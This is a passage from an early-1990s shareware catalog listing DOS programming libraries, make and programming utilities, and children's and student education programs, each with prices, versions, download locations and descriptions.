Inc., 215-443-9705 + Registration: $50.00 + Registration benefits: Printed Manual and Diskettes. + Version: 1.00 (09-01-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TCOMP.ZIP in PCVENC forum + LIB 6 on CompuServe. + Download size: 200k + Description: + Gives you high-speed access to four of the most popular + compression algorythms available. In addition to traditional + file-to-file compression methods, it allows compressing from + file-to-buffer, from buffer-to-file, and from one memory buffer + to another. + + Chapter 12, "Programming" 292 + + + + Product: TesSeRact File Management + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Registration benefits: Printed Manual and Diskettes. + Version: 1.00 (09-01-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TFILE.ZIP in PCVENC forum + LIB 6 on CompuServe. + Download size: 250k + Description: + This indexed file-access system reads/writes dBase-compatible + files, and is integrated with TCXL to provide high-level + control over data entry/editing. + + Product: TesSeRact Printer Control + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Registration benefits: Printed Manual and Diskettes. + Version: 1.00 (09-01-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TPRINT.ZIP in PCVENC + forum LIB 6 on CompuServe. + Download size: 150k + Description: + Provides a hardware-independent method for specifying the + appearance of reports and other printed output by arranging + each page of output in a buffer and sending it all to the + printer. + + Product: TesSeRact Screen Designer + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Registration benefits: Printed Manual and Diskettes. + Version: 1.00 (09-09-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TSD.ZIP in PCVENC forum + LIB 6 (multiple files) on CompuServe. + Download size: 85k + Description: + An interactive user-interface design tool capable of creating + clean, commented TCXL code. Combines windows, forms and menus + to allow full-featured program prototyping. + + Chapter 12, "Programming" 293 + + + + Product: TesSeRact TSR Devel. System + Needs: IBM PC, DOS 2.1 or better. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Registration benefits: Printed Manual and Diskette. + Version: 1.10 (09-01-89) + User benefits: Printed Manual and Diskette. + Look for: availability unknown on BBSs; TESS-?.ARC in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 75k + Description: + This is the standard toolkit for TSR development. This product + provides developers with everything needed to create compatible + TSRs that are well-behaved in today's complex environment. + + Product: The Window BOSS & Data Clerk + Needs: IBM PC, DOS 2.1 or better. "C" Compiler (Microsoft, + Borland, Watcom, Zortech, MIX, Top Speed). + Author: Star Guidance Consulting, Inc., 203-574-2449 + Registration: $55.00 + Registration benefits: Source code, phone/CompuServe/GEnie/BIX/ + mail support. + Version: 7.01 (03-15-92) + User benefits: Source code, phone/CompuServe/GEnie/BIX/mail + support. + Look for: BOSS*.* (multiple files) on BBSs; BOSS*.* in IBMPROG + forum LIB 3 (multiple files) on CompuServe; BOSS*.* in IBM RTC + LIB 9 (multiple files) on GEnie. + Download size: 1200k + Description: + Comprehensive set of windowing, data entry, and mouse + manipulation functions for the "C" language. Pop-up windows, + pull down menus, CUA(s), status lines, and the like can be + easily implemented. The Data Clerk makes it a snap to enter + text, integers, floats, longs, dates, phone numbers, and times. + Complex forms with individual field validation checks, help and + error messages are a snap. The programmer interface is clean, + uncluttered, and easy to remember. Generated code is fast and + small! + + Chapter 12, "Programming" 294 + + + + 12.3.3.1 C++ + + Product: Serial++ Asynch Comm Library + Needs: IBM PC, DOS 2.11 or better. Borland C++. At least one + serial port using 8250 UART (or clone). + Author: Cortlandt Technologies, 914-737-8649 + Registration: $24.95 + Registration benefits: Printed manual, complete C++ source, 1 + year tech support via mail or CompuServe, upgrade notices. + Version: 1.0 (02-07-91) + User benefits: Printed manual, complete C++ source, 1 year tech + support via mail or CompuServe, upgrade notices. + Look for: availability unknown on BBSs; SPP.EXE in BPROGB forum + LIB 6 on CompuServe. + Download size: 60k + Description: + This safe & efficient class library provides interrupt-driven + serial port support to Borland C++ programs. It comes ready to + link... no TSRs or assembly coding required. Classes are as + easy to use as console i/o in C, yet give complete access to + the 8250 UART, if needed. Handles multiple ports/instances, and + is protected against keyboard interruptions. + + 12.3.4 Pascal + + Product: KEYTREE TOOLBOX + Needs: IBM PC, DOS 2.1 or better. Turbo Pascal v4.0 or better. + Author: REWSE CONSULTANTS LIMITED + Registration: $50.00 + Registration benefits: Technical support by mail. + Version: 3.10 (08-01-91) + User benefits: Technical support by mail. + Look for: KEYTRBOX.ZIP on BBSs. + Download size: 300k + Description: + A set of library routines for Turbo Pascal programmers which + create and maintain randomly accessed files of variable length + records. The indexing algorithm needs only sufficient of the + record key to ensure uniqueness before reading a record (if you + only have one customer whose name starts with Z, you get the + record as soon as you type Z). Any number of files may be + opened and each may have up to 10 multi-field keys. Many other + features. + + Chapter 12, "Programming" 295 + + + + Product: TechnoJock's Turbo Toolkit + Needs: IBM PC, DOS 2.1 or better. Borland's Turbo Pascal v4.0 or + later compiler. + Author: TechnoJock Software, Inc., 713-493 6354 + Registration: $49.95 + Registration benefits: Printed manual, master disks, quick + reference card, newsletter/phone support. + Version: 5.02 (01-01-91) + User benefits: Printed manual, master disks, quick reference + card, newsletter/phone support. + Look for: BUFFER BOARD (multiple files) on BBSs (call 503-747 + 7636 to download it at no charge); TTT*.ZIP in BPROGA forum LIB + 0 (multiple files) on CompuServe. + Download size: 250k + Description: + The main focus of the Toolkit is to give programs a polished + and professional appearance. It includes a host of menu + building tools (pop-up and pull-down), sorted directory + listings, full screen data entry, window support, mouse support + and much more. + + "If you are programming in Turbo Pascal, you absolutely must + have TTT!" - Public-Domain Software & Shareware + + "Looks great! We have decided to implement your Toolkit in in- + house programs for Tech Support" Rich Kabota, Borland Int. + + Product: TesSeRact TSR Devel. System + Makes writing TSRs simple! See full description on page 292. + + 12.3.4.1 OOP Pascal for DOS (Borland) + + Product: TechnoJock's Object Toolkit + Needs: IBM PC, DOS 3.0 or better. Borland's Turbo Pascal v5.5 or + later compiler. + Author: TechnoJock Software, Inc., 713-493 6354 + Registration: $89.95 + Registration benefits: Printed manual, master disks, quick + reference card, newsletter/phone support. + Version: 1.00 (07-01-91) + User benefits: Printed manual, master disks, quick reference + card, newsletter/phone support. + Look for: BUFFER BOARD (multiple files) on BBSs (call 503-747 + 7636 to download it at no charge); TOT*.ZIP in BPROGA forum LIB + 0 (multiple files) on CompuServe. + Download size: 250k + Description: + An object-oriented library for building professional user + interfaces, including: windows, menus, full screen input with + Radio buttons, check boxes etc, linked list manager, directory + displays, date management, string manipulation and much more. + + "How can you resist?" PC Magazine + + Chapter 12, "Programming" 296 + + + + "I recommend this Toolkit to anyone who needs to write serious + applications in Turbo Pascal, or who just wants to learn about + object oriented programming in general" Turbo User Group + + 12.3.5 Other + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real Batch Language you wish DOS had. See full description + on page 69. + + Product: HyperPAD + The HyperMedia Platform for MS-DOS. See full description on + page 297. + + Product: WinBatch + Windows Batch Language. See full description on page 73. + + + 12.4 'Make' utilities + + Product: Maker + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.02 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: MAKED102.ZIP on BBSs; MAKED1.ZIP in IBMPRO forum LIB 6 + on CompuServe. + Download size: 23k + Description: + Creates program MAKE & LINK files. Eliminates the drudgery (& + errors) of building these files manually. Designed for C + programmers, but has enough generality that it works with many + other languages, as well. + + Product: Programmer's SUPER-MAINT + Needs: IBM PC, DOS 3.1 or better. 640k RAM. Language Compilers, + assemblers. + Author: EmmaSoft, 607-533-4685 + Registration: $55.00 + Registration benefits: Printed manual, master disks, support. + Version: 2.11 (10-01-91) + User benefits: Printed manual, master disks, support. + Look for: SUPER21*.ZIP (multiple files) on BBSs (call + 607-533-7072 to download it at no charge); SUPER*.ZIP in IBMPRO + forum LIB 3 (multiple files) on CompuServe. + Download size: 540k + Description: + The "easier" make utility, builds your make files and response + files for you. Remembers your command flags, and even the name + of the current make file! "Multiple Setups" lets you work on + several different projects at once. Leaves all but 2K for your + compiler in "swapping mode." + + Chapter 12, "Programming" 297 + + + + Supports Microsoft, Borland, Clipper, Aztec and Mix. Mouse + support, context sensitive help, user configurable. + + Product: Stamper + Changes file/date time stamps. See full description on + page 32. + + + 12.5 Hypertext/hypermedia + + Product: HyperPAD + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: Brightbill-Roberts and Company, Ltd., 800-444-3490 + Registration: $99.00 + Registration benefits: Printed manual and diskettes; free + technical support; preferred upgrade pricing; special offers + and updates. + Version: 2.2 (05-22-91) + User benefits: Printed manual and diskettes; free technical + support; preferred upgrade pricing; special offers and updates. + Look for: HP22D*.ZIP (multiple files) on BBSs (call 315-472-1058 + to download it at no charge); HP22D*.ZIP in PCVENC forum LIB 1 + (multiple files) on CompuServe; HP22D*.ZIP in IBMPC RTC LIB 3 + (multiple files) on GEnie. + Download size: 1500k + Description: + The hypermedia platform for character mode MSDOS based + computers, HyperPAD is a fast and flexible object-oriented + environment and development tool featuring visual programming, + a fast and English-like object script langauge with incremental + compiler, and a full set of screen design/drawing tools for + character mode application development. HyperPAD and its + langauge can be easily extended using modules written in C or + Assembler. Comes with an interactive tutorial and dozens of + example pads. + + + 12.6 Programming utilities + + Product: FileXref + Needs: IBM PC, DOS 2.0 or better. Hard disk; printer. + Author: ConVal Software, Inc., 805-529-6847 + Registration: $25.00 + Registration benefits: Phone support. + Version: 1.3 (10-01-91) + User benefits: Phone support. + Look for: FILXRF.ZIP on BBSs (call 617-354-8873 to download it at + no charge); FILXRF.ZIP in IBMPRO forum LIB 6 on CompuServe. + Download size: 100k + Description: + A new type of cross reference tool for programmers and + consultants. It scans ALL application source and ASCII + documentation files, producing cross reference information. + + Chapter 12, "Programming" 298 + + + + If you change a single file or symbol, FileXref reports show + the other files which may be impacted - other routines, batch + files and documentation! It also lists your unreferenced + obsolete files for you! Supports BASIC, BAT, C, C++, COBOL, + FORTRAN, MASM, Oracle, Pascal, PL/I, REXX, SQL, xBASE and ASCII + text files. + + Product: The Laughing Dog Screen Maker [***] + Text-mode Screen Designer w/Code Generation. See full + description on page 285. + + Product: NED + A Fast and Powerful Programmers Text Editor. See full + description on page 128. + + Product: PUTMAIL + Needs: IBM PC, DOS 3.0 or better. PVCS from Intersolv, and DOS + based LAN. Optional e-mail system -- See Mail. + Author: Gnosis Inc + Registration: $0.00 + Registration benefits: Unknown. + Version: 1.3 (01-01-92) + User benefits: Unknown. + Look for: availability unknown on BBSs; PVCS-L.ZIP in PCVENB + forum LIB 11 on CompuServe. + Download size: 150k + Description: + Simplify your use of PVCS! Use point & select menu system to + make easy check-in's of source code. Extended control + management, & also cross platform development. Users configure + rule based checks including - file .ext standards, auto new + file flagging, dir defaulting, cross-check duplicate files, + PVCS locks, compiles, tests, sign-offs & more! User comments + are auto logged to PVCS. System will match any PVCS file + structure. Makes DOS batch files for all check-ins across LAN, + & cross-platform xfers. + + Product: ReNamer + Needs: IBM PC, DOS 2.0 or better. Hard disk; printer. + Author: ConVal Software, Inc., 805-529-6847 + Registration: $40.00 + Registration benefits: Phone support. + Version: 1.1 (06-30-91) + User benefits: Phone support. + Look for: RENAMR.ZIP on BBSs (call 617-354-8873 to download it at + no charge); RENAMR.ZIP in IBMPRO forum LIB 6 on CompuServe. + Download size: 100k + Description: + When you need to change external and/or internal names in your + software, try ReNamer. It automates this tedious manual + exercise, changing ALL references and changing them uniformly! + Use it when porting to a new platform, to re-organize your + naming conventions, to make your code more maintainable - + whenever renaming is called for. + + Chapter 12, "Programming" 299 + + + + Supports BASIC, BAT files, C, C++, COBOL, FORTRAN, MASM, MAKE + files, Oracle, Pascal, PL/I, REXX, xBASE, and ASCII text files. + A tool for the professional! + + Product: RIE - Rimrock Icon Editor + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: Rimrock Software, 208-772-9347 + Registration: $29.00 + Registration benefits: Printed manual, unlimited support. + Version: 1.04 (02-20-92) + User benefits: Printed manual, unlimited support. + Look for: RIE104.ZIP on BBSs (call 208-765-0180 to download it at + no charge); RIE104.ZIP in PCVENC forum LIB 6 on CompuServe. + Download size: 141k + Description: + Now you can dress up text-based programs you create with + graphic images, without rewriting your program for a graphics + display mode. With RIE, you can create 'pseudo-graphic' icons + to display on an EGA or VGA display in text mode. + + Created primarily to support version 6 of TCXL, the TesSeRact C + eXtended Library, but the ICONLOAD example provided shows you + how to load icons on your own. + + Product: Technical Editor + DOS/OS2 Programmers/Text editor (VIRTUAL). See full + description on page 131. + + + 12.7 Software tools + + See also: Database applications, Software tools (page 165). + + 12.7.1 For multiple programs + + Product: BootMaster [***] + Boot Configuration Manager. See full description on page 75. + + 12.7.2 For other + + Product: 4Print + Paper saving utility for LaserJets & DeskJets. See full + description on page 54. + + Product: Btr Help! + Needs: IBM PC, DOS 3.0 or better. BTRIEVE.EXE or BREQUEST.EXE. + Author: Informative Technologies, 202-675-4528 + Registration: $40.00 + Registration benefits: Printed Manual with disk; One year of + Phone/FAX/Mail/Email/BBS support; Bonus Disk of Btrieve + Utilities; Btrieve 'C' Library with full source; Certificate + + Chapter 12, "Programming" 300 + + + + for Free CompuServe Membership; Certificate for $7 off a + subscription to Shareware Magazine. + Version: 1.88 (06-15-91) + User benefits: Printed Manual with disk; One year of Phone/FAX/ + Mail/Email/BBS support; Bonus Disk of Btrieve Utilities; + Btrieve 'C' Library with full source; Certificate for Free + CompuServe Membership; Certificate for $7 off a subscription to + Shareware Magazine. + Look for: BTRHLP??.ZIP on BBSs (call 301-596-1180 to download it + at no charge); BHLP??.ZIP in NOVA forum LIB 14 on CompuServe. + Download size: 180k + Description: + Provides the functions needed for the design, development and + maintenance of applications using Btrieve. It's great for file + maintenance with: Great Plains Accounting, IBM's Platinum + Series, Pacioli 2000 Accounting, Galacticomm BBS, Macola + Accounting, Xtrieve, Magic PC DBMS, DacEasy Accounting or any + application that uses Btrieve. It provides an easy way to + repair damaged Btrieve database files or test their integrity. + Browse and edit records in many different formats -- and much + more! + + Product: Btr Watch + Memory resident Btrieve debugger. See full description on + page 171. + + Product: Changer/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.01 (07-06-91) + User benefits: Eligibility for free upgrades. + Look for: CHANO101.ZIP on BBSs; CHAN01.ZIP in IBMPRO forum LIB 6 + on CompuServe. + Download size: 23k + Description: + Quickly changes words & phrases in text files without loading a + bulky word processor or text editor. Options to change files + in multiple directories, and to change hidden or read only + files. Typical uses include changing names in form letters or + other documents, or changing variable names in the source code + of a multimodule program. Built in safety features to prevent + data corruption. + + Chapter 12, "Programming" 301 + + + + Product: Convert To Structured BASIC + Needs: IBM PC, DOS 3.0 or better. + Author: Unique Software + Registration: $19.95 + Registration benefits: Reduced rate upgrades; notification of + major upgrades; tech support by Fax and/or CompuServe Mail. + Version: 1.3 (11-15-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; tech support by Fax and/or CompuServe Mail. + Look for: CVT-2SB.EXE on BBSs; CVT-SB.EXE in IBMPRO forum LIB 4 + on CompuServe. + Download size: 65k + Description: + Converts GW-BASIC programs to a more structured, more legible + Structured (compiler) Basic format. + * unpacks multi-statement lines + * block all "IF" statements + * converts line number to labels + * removes unnecessary labels + * indents IF and looping structures + * self-extracting LZW archive + + Product: DB2DOC + Automatic DBF documentation for FoxPro/FB+. See full + description on page 168. + + Product: DB2PRG + Automatic DBF file creation for FoxPro/FB+. See full + description on page 168. + + Product: HyperPAD + The HyperMedia Platform for MS-DOS. See full description on + page 297. + + Product: LiteComm(tm) for Microsoft C + LiteComm Communication Toolbox for Msoft C. See full + description on page 290. + + Product: LiteComm(tm) for Turbo C + LiteComm Communications ToolKit for Turbo C. See full + description on page 290. + + Chapter 12, "Programming" 302 + + + + Product: MouseTools + Needs: IBM PC, DOS 2.1 or better. Turbo Pascal. + Author: Arcanum Computing + Registration: $10.00 + Registration benefits: Master disks, source code. + Version: 1.0 (09-13-89) + User benefits: Master disks, source code. + Look for: MOUSTL55.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 100k + Description: + Provides a set of mouse interface routines for Turbo Pascal + programmers. Included are low level routines for positioning + and moving mouse cursors as well as higher level routines for + selecting files, multiple choice questions, etc. + + Product: PBfmt + Formats Power Basic Source Code Beautifully! See full + description on page 287. + + Product: PBWindows + Wonderful Popup windows for PB. See full description on + page 288. + + Product: PopDBF + 4K TSR for "Instant Access to X-Base Files" See full + description on page 166. + + Product: Prgmr's Productivity Pack Lite + Productivity Tools for Programmers. See full description on + page 285. + + Product: Programmer's Productivity Pack + Productivity Tools for Programmers. See full description on + page 286. + + Product: QQUERY (All Fox versions) + Elaborate Query manager for FoxPro & FoxBASE+. See full + description on page 169. + + Product: QQUERY (FoxBASE+ 2.10 version) + Elaborate Query manager for FoxPro & FoxBASE+. See full + description on page 169. + + Product: QQUERY (FoxPro 1.02 version) + Elaborate Query Manager for FoxPro & FoxBASE+. See full + description on page 170. + + Product: QQUERY (FoxPro 2.0 version) + Elaborate Query manager for FoxPro & FoxBASE+. See full + description on page 170. + + Chapter 12, "Programming" 303 + + + + Product: Show Partner Lite + Screen Show and Demo Disk Development System. See full + description on page 331. + + Product: Simply Help! + Needs: IBM PC, DOS 2.1 or better. 384k RAM, hard disk + recommended. + Author: SimpleWare, 709-489-3757 + Registration: $35.00 + Registration benefits: Latest version with shareware notices + removed. Support by mail. + Version: 1.0 (01-07-91) + User benefits: Latest version with shareware notices removed. + Support by mail. + Look for: SIMHLP10.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 285k + Description: + Create stand alone help systems or add help to any program. + Editor has pull down menus, dialog boxes, mouse support, on- + line help, block operations, line drawing, import/export, + reports, and many more. Edit your file and instantly RUN it to + see the results. + + Compiler creates EXE files or TSR files with your choice of hot + key. A library for QuickBASIC 4.xx is included. Applications + include TSR help for existing programs, catalogs, readme files, + manuals, on-line help for QuickBASIC programs. + + Product: TesSeRact Screen Designer + Code-Generator for TCXL. See full description on page 292. + + Product: WinEdit + Perfect ASCII editor for Windows 3.0. See full description on + page 131. + + Product: Workbase + Dot-prompt utility for DBMS programmers. See full description + on page 172. + + + 12.8 Other + + Product: BOOT.SYS + Use boot-up menus to select system config. See full + description on page 74. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real Batch Language you wish DOS had. See full description + on page 69. + + Product: LJLAND [***] + Print docs, listings, manuals, spreadsheets. See full + description on page 59. + + Chapter 12, "Programming" 304 + + + + Product: PBWindows + Wonderful Popup windows for PB. See full description on + page 288. + + Product: PullDown SAA Menu Shell + SAA CUA Compliant Dialog Boxed Menu System. See full + description on page 105. + + Chapter 13, "Education" 305 + + + + + + Chapter 13 + Education + + + 13.1 Preschool + + Product: Balloons + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: AssistWare, 919-544-5567 + Registration: $7.00 + Registration benefits: Support, updates, information about other + children's programs. + Version: 3.8 (03-29-91) + User benefits: Support, updates, information about other + children's programs. + Look for: BALLOONS.* (multiple files) on BBSs (call 317-856-2319 + to download it at no charge); BALLOONS.ZIP in IBMPC RTC LIB 0 + on GEnie. + Download size: 89k + Description: + A simple, easy-to-use program designed to help young children + become familiar with the computer and have fun at the same + time. It provides visual delight for children 18 months and up + and hands-on experience with the computer. Balloons appear as + any key is struck and may be enlarged until they pop into a + rainbow as "Twinkle, Twinkle Little Star" plays. This program + is designed to be your child's first program and to provide + hours of enjoyment. + + Product: Brandon's Bigbox + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Robichaux and Associates, 504-752-2620 + Registration: $20.00 + Registration benefits: Printed manual, master disks, 90 days + support. + Version: 1.5 (02-04-92) + User benefits: Printed manual, master disks, 90 days support. + Look for: availability unknown on BBSs; BIGBOX.ZIP in IBMAPP + forum LIB 11 (multiple files) on CompuServe. + Download size: 320k + Description: + Contains 26 colorful animated games and drills designed for pre + and beginning readers. Learn alphabet skills, keyboard skills, + shapes and sizes, word matching, sight words, arithmetic, US + geography, plus some plain old FUNTIME! Lots of colorful + animations; also, keep the games fresh by customizing your own + word lists! + + Product: Dr. Motes' Colorbook + Coloring book program for young children. See full description + on page 336. + + Chapter 13, "Education" 306 + + + + Product: DrawSome + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: AssistWare, 919-544-5567 + Registration: $8.00 + Registration benefits: Support, updates, information on other + children's programs. + Version: 2.4 (03-30-91) + User benefits: Support, updates, information on other children's + programs. + Look for: availability unknown on BBSs; DRAWSOME.ZIP in IBMPC RTC + LIB 0 on GEnie. + Download size: 105k + Description: + A simple program designed to help young children become + familiar with the computer, mouse, and mouse operations. Lines + are drawn on the screen by moving an image of a hand with the + arrow-keys or mouse. Line color is selectable by keys or by + clicking the mouse buttons. The program also draws flowers, + circles, triangles, and squares. + + Excellent program for developing mouse skills, finding the + location of certain keys, and learning basic geometric shapes. + + Product: DressMeUp + Cute paper doll game with stuffed animals. See full + description on page 421. + + Product: EGA Mouse Paint + Electronic Coloring Book. See full description on page 307. + + Product: Pallanda + Somewhat like Candy-Land with color spinner. See full + description on page 392. + + Product: Play 'n' Learn + Needs: IBM PC, DOS 3.1 or better. CGA monitor. + Author: HomeCraft Software, 503-692-3732 + Registration: $10.00 + Registration benefits: Unknown. + Version: 3.00 (01-15-92) + User benefits: Unknown. + Look for: availability unknown on BBSs. + Download size: 150k + Description: + An education program for very young children 18 months to 3 + years old. Includes eight basic games with multiple + variations. The games range from very simple - push a key and + get a response type game for 18 month old children - to more + complex alphabet and matching games. Also includes an etch-a- + sketch type drawing game. + + Product: School-Mom + Complete children's education software. See full description + on page 329. + + Chapter 13, "Education" 307 + + + + Product: Strudle + Crayola draw and paint with save and redraw. See full + description on page 335. + + + 13.2 Elementary + + Product: Brandon's Bigbox + Educational fun for beginning and pre-readers. See full + description on page 305. + + Product: Dr. Motes' Colorbook + Coloring book program for young children. See full description + on page 336. + + Product: DressMeUp + Cute paper doll game with stuffed animals. See full + description on page 421. + + Product: EGA Mouse Paint + Needs: IBM PC, DOS 3.3 or better. EGA monitor; Microsoft mouse. + Author: Fischer Grafix & Software + Registration: $20.00 + Registration benefits: Master disks, phone support. + Version: 4.2 (01-30-92) + User benefits: Master disks, phone support. + Look for: EGAMP.ZIP on BBSs; EGAMP.ZIP in IBMAPP forum LIB 11 on + CompuServe. + Download size: 95k + Description: + If your kids like to color then they will enjoy using the mouse + to color in any of 29 pre-made picture. There are over 70 + colors and patterns to select from in the program. Selecting a + picture and coloring it in is as easy as point and click. An + additional feature is the arrow draw program which allows you + to create and color your own drawings. + + Product: Flags [***] + Displays 600 Flags from around the World. See full description + on page 308. + + Product: Melissa's Music Flashcards + Music flashcards that are fun. See full description on + page 376. + + Product: MEMORY [***] + Computer version of Concentration. See full description on + page 400. + + Product: Q&A Study Aid + Comprehensive Computer Testing/Grading System. See full + description on page 324. + + Chapter 13, "Education" 308 + + + + Product: School-Mom + Complete children's education software. See full description + on page 329. + + Product: Spell Games + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: TexaSoft, 214-291-2115 + Registration: $19.00 + Registration benefits: Registration, bonus programs, newsletter. + Version: 1.1 (06-01-91) + User benefits: Registration, bonus programs, newsletter. + Look for: SPELL.ZIP on BBSs; SPELL.ZIP in IPMAPP forum LIB 11 on + CompuServe. + Download size: 150k + Description: + Practice Spelling as an Olympic Game. Pits your country + angainst another country. Choose spelling words from very easy + to very difficult. Words in the game come from spelling bee + lists. Also, easily add your own spelling words with the built + in editor -- enter your child's weekly spelling words. One of + th + our beta testers went on to win the school's spelling bee (5 + grade), something she had never come close to doing before. + + Product: STS26 + Space Shuttle Tracker. See full description on page 311. + + Product: ToyBox II [***] + Powerful EGA/VGA graphical menu for all ages. See full + description on page 107. + + Product: World Name Game + Graphic Geography Game. See full description on page 310. + + Product: Zpeller [***] + Improves spelling & vocabulary skills. See full description on + page 310. + + + 13.3 Junior high + + Product: EQUALIZER + Student and teacher test making and review. See full + description on page 312. + + Chapter 13, "Education" 309 + + + + Product: Flags [***] + Needs: IBM PC, DOS 3.0 or better. 320k RAM, CGA monitor. + Author: Wyndware, 608-755-1628 + Registration: $25.00 + Registration benefits: Printed manual, master disks, upgrade + discounts. + Version: 1991b (08-01-91) + User benefits: Printed manual, master disks, upgrade discounts. + Look for: FLAGS91.ZIP on BBSs. + Download size: 270k + Description: + The flags of the nations of the world are powerful symbols, + representing the history, beliefs, and hopes of the people of + each country. This program displays full-color represenations + of over 600 different flags: flags of every independent nation + in the world, plus hundreds of historical, regional, naval, and + personal flags. The flags may be viewed individually, or the + program may be set to exhibit a continuous display of all the + flags. There is also a flag quiz to test your knowledge of + flags. + + Product: I.Q. Challenge + Test knowledge in 5 categories, earn diploma. See full + description on page 409. + + Product: Q&A Study Aid + Comprehensive Computer Testing/Grading System. See full + description on page 324. + + Product: School-Mom + Complete children's education software. See full description + on page 329. + + Product: Spell Games + Practice Spelling as an Olympic Game. See full description on + page 308. + + Product: STS26 + Space Shuttle Tracker. See full description on page 311. + + Product: TEACHER + Home study aid, many subjects. Configurable. See full + description on page 313. + + Product: WinGraph [***] + Cartesian (2D & 3D) & Polar Equation Grapher. See full + description on page 280. + + Chapter 13, "Education" 310 + + + + Product: World Name Game + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Robert L. Lloyd + Registration: $15.00 + Registration benefits: Unlimited assistance by mail. + Version: 6.10 (09-18-91) + User benefits: Unlimited assistance by mail. + Look for: availability unknown on BBSs; WNG2.EXE in IBMAPP forum + LIB 11 on CompuServe. + Download size: 300k + Description: + Provides a unique geography learning environment. Through a + game like environment the program promotes the study of place- + name geography. Over 200 of the world's capital cities are + randomly presented as a graphic depiction of the country and + surrounding area. Options include various size areas, adjacent + capitals, and latitude and longitude. The user is challenged to + enter the correct city or city and country name. Each user has + a record of his ten best scores. + + Product: WORLD29 + Global Mapping/tracking Geography. See full description on + page 330. + + Product: YRWAY + Student study aid, fully configurable. See full description on + page 314. + + Product: Zpeller [***] + Needs: IBM PC, DOS 2.11 or better. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $20.00 + Registration benefits: Master disks, phone/BBS/mail support, + product discounts. Shareware disks of other programs. + Version: 2.00 (04-11-92) + User benefits: Master disks, phone/BBS/mail support, product + discounts. Shareware disks of other programs. + Look for: ZPELR200.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ZPELER.ZIP in EDFORUM forum LIB 2 on CompuServe. + Download size: 227k + Description: + An easy and effective way to improve spelling and vocabulary + for the individual student or an entire classroom. Tests + students in not only correct spelling but the word's + definition. Tracks words continually missed to help the + th + student concentrate on those words. Whether the user is a 4 + grader with weekly tests or an out of school adult wanting to + improve those crucial spelling and vocabulary skills; Zpeller + is there to help. Handles up to 19 students at once, up to + 64,000 words per student. + + Chapter 13, "Education" 311 + + + + 13.4 High school + + Product: ACCU Music Printer + Prints out sheet music, transposes, etc. See full description + on page 375. + + Product: EQUALIZER + Student and teacher test making and review. See full + description on page 312. + + Product: FDplot + A quick scientific function/data & stat plot. See full + description on page 312. + + Product: Fictionary + The game of fantastic/farfetched definitions. See full + description on page 415. + + Product: I.Q. Challenge + Test knowledge in 5 categories, earn diploma. See full + description on page 409. + + Product: PC-ECAP + AC Circuit Analysis program with graphics. See full + description on page 276. + + Product: Q&A Study Aid + Comprehensive Computer Testing/Grading System. See full + description on page 324. + + Product: Save the Planet + Ozone & greenhouse data, easy word processor. See full + description on page 325. + + Product: STS26 + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Robert L. Lloyd + Registration: $10.00 + Registration benefits: Unlimited support by mail. + Version: 7.0 (10-08-90) + User benefits: Unlimited support by mail. + Look for: availability unknown on BBSs; STS26.ZIP in IBMAPP forum + LIB 13 on CompuServe. + Download size: 150k + Description: + Provides a method for tracking the flight of the space shuttle. + Additionally the user can learn the dynamics of space flight. + Provides default setting for a typical shuttle mission. It + allows the user to enter a variety of parameters to accurately + track a given mission. Launch is permitted from Kennedy Space + Center, Vandenberg, any of the three Soviet launch sites, or + from South America. Each launch site provides its own default + launch parameters. On orbit parameters can be varied. + + Chapter 13, "Education" 312 + + + + Product: TEACHER + Home study aid, many subjects. Configurable. See full + description on page 313. + + Product: WinGraph [***] + Cartesian (2D & 3D) & Polar Equation Grapher. See full + description on page 280. + + Product: World Name Game + Graphic Geography Game. See full description on page 309. + + Product: WORLD29 + Global Mapping/tracking Geography. See full description on + page 330. + + Product: YRWAY + Student study aid, fully configurable. See full description on + page 314. + + Product: YRWAYx.ZIP + Student aid, configurable to many languages. See full + description on page 314. + + Product: Zpeller [***] + Improves spelling & vocabulary skills. See full description on + page 310. + + + 13.5 College + + Product: EQUALIZER + Needs: IBM PC, DOS 3.0 or better. + Author: Nine-Patch Software + Registration: $20.00 + Registration benefits: Master disks, mail support. + Version: 1.03 (03-20-92) + User benefits: Master disks, mail support. + Look for: availability unknown on BBSs. + Download size: 400k + Description: + Students working individually or in groups become aware of + their thinking as they translate class notes and reading + assignments into high quality test questions. In the process + they are converted from passive pupils into active scholars. + Teachers can prepare instructional question files in specific + topics for students to review at three levels of thinking and + to start the above writing process. Sample instructional + question files (IQF) are included. + + Chapter 13, "Education" 313 + + + + Product: FDplot + Needs: IBM PC, DOS 2.0 or better. CGA monitor. Hard disk + recommended. + Author: Abri TEchnologies, Inc. + Registration: $15.00 + Registration benefits: Three months support. + Version: 1.2 (02-27-92) + User benefits: Three months support. + Look for: availability unknown on BBSs; 